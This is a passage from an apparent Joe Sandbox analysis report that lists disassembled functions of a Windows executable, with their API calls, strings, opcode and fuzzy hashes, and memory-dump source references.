                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                      • API String ID: 984253442-2268648507
                                                                                                                                                                                      • Opcode ID: e22f47a7b6b8e0929afe3e6aa2ddd7e5d55785255df23c544ce2bc8aab69ea25
                                                                                                                                                                                      • Instruction ID: febea8c3cf1557585b8bce67afc80280ec90afb4d89c38950fe147ee17ff2be4
                                                                                                                                                                                      • Opcode Fuzzy Hash: e22f47a7b6b8e0929afe3e6aa2ddd7e5d55785255df23c544ce2bc8aab69ea25
                                                                                                                                                                                      • Instruction Fuzzy Hash: F5414D72904219AADB04FBE0DD86FEFB77CAF94711F504565B201B20E2EA656F04CB61
                                                                                                                                                                                      Function 0094D950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0094D96C
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0094D98E
                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0094D9CB
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0094D9F0
                                                                                                                                                                                      • _memset.LIBCMT ref: 0094DA0F
                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 0094DA4B
                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0094DA80
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0094DA8B
                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0094DA94
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0094DA9E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                                                                                      • Opcode ID: 592b4902cc7f1204898eb8d5b5fd995d18e01c7d77a6c57ca6c523e52e61e647
                                                                                                                                                                                      • Instruction ID: 4c7e8cdcfbcf3119281765f23e94767c5a10c8bd59d61dac34013ee5c59fb43b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 592b4902cc7f1204898eb8d5b5fd995d18e01c7d77a6c57ca6c523e52e61e647
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1331C476611208ABDF20DFA4DC89FDA77BCBF84710F0085A5F519D21A0E7709A819BA1
                                                                                                                                                                                      Function 0093957D Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 884005220-0
                                                                                                                                                                                      • Opcode ID: fa7db89ca192b430118c05591a8e201ca07e2afe548c81f6668493a0dc38e857
                                                                                                                                                                                      • Instruction ID: 82dea1f3d1df517c8f7507bfede996cd60f916f13e886c530f3aedd481e0e477
                                                                                                                                                                                      • Opcode Fuzzy Hash: fa7db89ca192b430118c05591a8e201ca07e2afe548c81f6668493a0dc38e857
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A61277291A211EFEB215F78EC42B6D77A8EF80328F240515E8069B2D5DBB9CC408F65
                                                                                                                                                                                      Function 0096E541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0096E564
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0096E57B
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0096E586
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0096E593
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0096E59C
                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0096E5AB
                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0096E5B4
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0096E5BB
                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0096E5CC
                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0098D9BC,?), ref: 0096E5E5
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0096E5F5
                                                                                                                                                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 0096E619
                                                                                                                                                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0096E644
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0096E66C
                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0096E682
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3840717409-0
                                                                                                                                                                                      • Opcode ID: 257778a640c5e3aa82aeb4a8c3df1f71851d2000e0297514c7299793adccf1f8
                                                                                                                                                                                      • Instruction ID: f5bc6b2387204e4b41256b19c2cbac1ebc3beb8c768ba5524a41a1ae90ec3c59
                                                                                                                                                                                      • Opcode Fuzzy Hash: 257778a640c5e3aa82aeb4a8c3df1f71851d2000e0297514c7299793adccf1f8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 73413975605208EFDB119F65DC88EAABBBDEF89725F108058F906D72A0D731AD01EB20
                                                                                                                                                                                      Function 00950B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00950C93
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00950CAB
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00950CBD
                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00950CD2
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00950CE6
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00950CFE
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00950D18
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00950D2A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                                                                                      • Opcode ID: 39311c63d77a173f2d291abb100a7b72d39ad4e22e1468e5fcf4f905ae8333de
                                                                                                                                                                                      • Instruction ID: 5dc6afd7c9c1d528a21f5f5d22b49fb0f4075c3a953fb0733d21828bfe90ddb8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 39311c63d77a173f2d291abb100a7b72d39ad4e22e1468e5fcf4f905ae8333de
                                                                                                                                                                                      • Instruction Fuzzy Hash: 988191716043059FCB64DF65C884AAAB7E8BBC9315F148D2AFCC5C7251E734E988CB92
                                                                                                                                                                                      Function 0096ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0091AF8E
                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0096ED0C
                                                                                                                                                                                      • GetFocus.USER32 ref: 0096ED1C
                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0096ED27
                                                                                                                                                                                      • _memset.LIBCMT ref: 0096EE52
                                                                                                                                                                                      • GetMenuItemInfoW.USER32 ref: 0096EE7D
                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 0096EE9D
                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0096EEB0
                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0096EEE4
                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0096EF2C
                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0096EF64
                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0096EF99
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 1296962147-4108050209
                                                                                                                                                                                      • Opcode ID: 4a26b685a6da302f27ac3a04d03415c9b5641e3c1d539be37aa3519abb639862
                                                                                                                                                                                      • Instruction ID: 267142dbeea62a2c6bc7d3828dd2722c3a8c13cb3fe6f53438839d4c8082ff9c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a26b685a6da302f27ac3a04d03415c9b5641e3c1d539be37aa3519abb639862
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8381AB75608311AFDB21DF14D884EABBBE8FF88354F10092EF99997291D731D901DBA2
                                                                                                                                                                                      Function 0093B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0093B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0093B903
                                                                                                                                                                                        • Part of subcall function 0093B8E7: GetLastError.KERNEL32(?,0093B3CB,?,?,?), ref: 0093B90D
                                                                                                                                                                                        • Part of subcall function 0093B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0093B3CB,?,?,?), ref: 0093B91C
                                                                                                                                                                                        • Part of subcall function 0093B8E7: HeapAlloc.KERNEL32(00000000,?,0093B3CB,?,?,?), ref: 0093B923
                                                                                                                                                                                        • Part of subcall function 0093B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0093B93A
                                                                                                                                                                                        • Part of subcall function 0093B982: GetProcessHeap.KERNEL32(00000008,0093B3E1,00000000,00000000,?,0093B3E1,?), ref: 0093B98E
                                                                                                                                                                                        • Part of subcall function 0093B982: HeapAlloc.KERNEL32(00000000,?,0093B3E1,?), ref: 0093B995
                                                                                                                                                                                        • Part of subcall function 0093B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0093B3E1,?), ref: 0093B9A6
                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0093B5F7
                                                                                                                                                                                      • _memset.LIBCMT ref: 0093B60C
                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0093B62B
                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 0093B63C
                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0093B679
                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0093B695
                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 0093B6B2
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0093B6C1
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0093B6C8
                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0093B6E9
                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 0093B6F0
                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0093B721
                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0093B747
                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0093B75B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                                      • Opcode ID: 8ad5a0d146656066c61942e049e2e0b668a4392cc20831576234ebe587fbc6a6
                                                                                                                                                                                      • Instruction ID: d92388a75b0f9f8e12f6e0fe9084e4004daa43d0f892b9af6a16942f1cb459c8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ad5a0d146656066c61942e049e2e0b668a4392cc20831576234ebe587fbc6a6
                                                                                                                                                                                      • Instruction Fuzzy Hash: EC514B75900209AFDF009FA4DC85EEEBB79FF44314F048169EA16EA290DB319A05DF60
                                                                                                                                                                                      Function 0095A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0095A2DD
                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0095A2E9
                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 0095A2F5
                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0095A302
                                                                                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0095A356
                                                                                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0095A392
                                                                                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0095A3B6
                                                                                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 0095A3BE
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0095A3C7
                                                                                                                                                                                      • DeleteDC.GDI32(00000006), ref: 0095A3CE
                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0095A3D9
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                                                                                      • Opcode ID: ad64623e9f9863e0e4210b4f3759ba6bb8e87c71f6f57f6d86cce1ce990b8101
                                                                                                                                                                                      • Instruction ID: 2679c1a2d0de6e777f1f45333276c8ea8fc984305c6a57484ac5da208499d044
                                                                                                                                                                                      • Opcode Fuzzy Hash: ad64623e9f9863e0e4210b4f3759ba6bb8e87c71f6f57f6d86cce1ce990b8101
                                                                                                                                                                                      • Instruction Fuzzy Hash: EF515971904309AFCB14CFA9DC88EAEBBB9EF48310F14851DF95AA7350C735A845CB54
                                                                                                                                                                                      Function 0094D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF), ref: 0094D567
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 0094D589
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0094D5DC
                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0094D68D
                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0094D6AB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                      • API String ID: 2116804098-2391861430
                                                                                                                                                                                      • Opcode ID: f1a8504ffc324ce80762d88cbaeadf7b8213511e061f9cb6b6de2e424c54b6d5
                                                                                                                                                                                      • Instruction ID: fe8d9f22205249ae2bb2878be2beb25f1ab95eebb69922141d61b744698347a3
                                                                                                                                                                                      • Opcode Fuzzy Hash: f1a8504ffc324ce80762d88cbaeadf7b8213511e061f9cb6b6de2e424c54b6d5
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF51BE72901109FECB05EBA0CD82FEEB779AF84704F108565F105B20A2EB316F48DBA0
                                                                                                                                                                                      Function 0094D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0094D37F
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0094D3A0
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0094D3F3
                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0094D499
                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0094D4B7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                      • API String ID: 2116804098-3420473620
                                                                                                                                                                                      • Opcode ID: bb2bc4fb8ed175628df1ab843f68ef4212c10d1c52f4e5210c877fba16499cf4
                                                                                                                                                                                      • Instruction ID: e2c1432dfba6dcfb2d09559c432d7050091199bed35be94a246e890b8234e5b7
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb2bc4fb8ed175628df1ab843f68ef4212c10d1c52f4e5210c877fba16499cf4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1651B072901109FADB15EBE0CD42EEEB778AF54704F108565B105B20E2EB716F58DB61
                                                                                                                                                                                      Function 0093AEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      • _memset.LIBCMT ref: 0093AF74
                                                                                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0093AFA9
                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0093AFC5
                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0093AFE1
                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0093B00B
                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0093B033
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0093B03E
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0093B043
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
